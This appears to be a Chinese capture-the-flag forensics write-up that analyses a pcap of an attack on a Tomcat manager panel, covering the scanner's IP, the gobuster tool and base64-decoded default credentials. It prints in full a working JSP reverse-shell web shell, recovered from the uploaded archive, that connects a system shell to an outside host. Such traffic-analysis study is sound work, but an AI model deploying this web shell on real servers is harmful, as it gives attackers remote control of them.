玄机——流量特征分析tomcat
下载附件,是一个pcap流量包。首先要我们分析扫描的IP,使用筛选GET请求数据包,可快速定位到恶意IP。在使用查询软件即可定位IP所在城市为广州。
筛选IP源为14.0.0.120的HTTP数据包,查看访问manager路由的数据包,在Destination字段可看到访问的目的端口为8080。故8080端口提供对服务器管理面板的访问
分析攻击者使用的攻击工具,我们就需要先定位攻击者的攻击流量。找到唯一一个POST包,将包保存下来后我们使用foremost提取出之中的压缩包,解压后我们找到一个rzpmxxmm.jsp
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream ns;
OutputStream vA;
StreamConnector( InputStream ns, OutputStream vA )
{
this.ns = ns;
this.vA = vA;
}
public void run()
{
BufferedReader w7 = null;
BufferedWriter kLz = null;
try
{
w7 = new BufferedReader( new InputStreamReader( this.ns ) );
kLz = new BufferedWriter( new OutputStreamWriter( this.vA ) );
char buffer[] = new char[8192];
int length;
while( ( length = w7.read( buffer, 0, buffer.length ) ) > 0 )
{
kLz.write( buffer, 0, length );
kLz.flush();
}
} catch( Exception e ){}
try
{
if( w7 != null )
w7.close();
if( kLz != null )
kLz.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket( "10.0.0.142", 80 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
找到了此木马文件,我们就需要将流量源IP定位至10.0.0.142来查看TCP流了。但是发现竟然没有IP地址为此的流量。还要我们分析攻击者使用的工具,既然此jsp脚本无特征,我们就要返回查看后台扫描包的特征了。查看发现攻击者使用gobuster来进行攻击。
接下来我们需要分析登陆成功的账密。依然是在上传的POST保重,将Authorization字段base64解密一下即可得到账密admin:tomcat
最后我们需要分析维持提权成功后的登录。在后门IP与靶机无数据交互的前提下,又没有多余的TCP包,我们只能查看tcp包的内容。直接搜索TCP包中关键词bin即可得到关键信息。
